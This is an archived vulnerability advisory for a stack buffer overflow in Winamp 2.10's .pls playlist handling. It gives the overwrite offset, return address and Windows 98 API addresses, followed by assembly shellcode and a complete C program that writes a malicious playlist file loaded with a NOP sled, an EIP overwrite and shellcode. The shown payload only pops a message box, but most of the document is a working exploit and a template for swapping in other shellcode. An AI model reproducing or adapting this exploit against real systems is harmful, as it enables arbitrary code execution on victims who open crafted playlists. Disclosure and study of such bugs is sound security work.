TUCoPS :: Windows Apps :: winamp.txt

Nullsoft Winamp 2.10 has a buffer overflow in its handling of playlist files allowing execution of arbitrary code.


[ http://www.rootshell.com/ ]

darkplan <darkplan@OCEANFREE.NET>

Nullsoft Winamp 2.10 buffer overflow advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: Steve Fewer, darkplan@oceanfree.net
 http://indigo.ie/~lmf
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Introduction:

I recently uncovered a stack based buffer overflow in winamp version 2.10
which lets me execute 'arbitrary code'. It is carried out through .pls files
which winamp uses for playlists.  This is unnerving as it is a feasible plan
to trade playlists on irc during a mp3 trading session with someone.

The overflow occurs when an entry greater than 580 bytes is read in from a
.pls file. The EIP is the only register overwritten in the next four bytes
that follow, from there on is space for your shell code. eg.

[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1

The first 580 bytes get mangled around in memory but the 585 byte (where our
shell code starts) is pointed to by the ESP, therefore a simple 'JMP ESP' or
the like will land us back in our shell code. I used a 'JMP ESP' at address
0xBFB9CFF7 in comctl32.dll which winamp loads. Pointing our EIP into that
address lands us back where we want to be.

This was all created/tested on Windows 98 [Version 4.10.1998] running on an
Intel PII400 with 128MB RAM.


The Shell Code:

The shell code I wrote for this simply displays a message box and then calls
exit(). However Winamp doesn't load msvcrt.dll which is needed to call
exit() so we have to load it ourselves.  I used the address 0xBFF776D4 in
kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling Messagebox I used
the address 0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It didn't warrant
using GetProcAddress for compatibilities sake. For the OP codes see the
exploit further on.

// This loads msvcrt.dll
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0xBFF776D4
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
// This calls MessageBox to say 'Hi!'
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr[ebp-04h],48h
mov byte ptr[ebp-03h],69h
mov byte ptr[ebp-02h],21h
mov edx, 0xBFF5412E
push edx
push edi
lea edx,[ebp-04h]
push edx
push edx
push edi
call dword ptr[ebp-08h]
// This calls exit()
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]

The Exploit:

<-snip->

/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>

int main()
{

printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");

char buffer[640];
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

FILE *file;

for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}

file = fopen("crAsh.pls","wb");

fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");

fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}

<-snip->

[ http://www.rootshell.com/ ]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH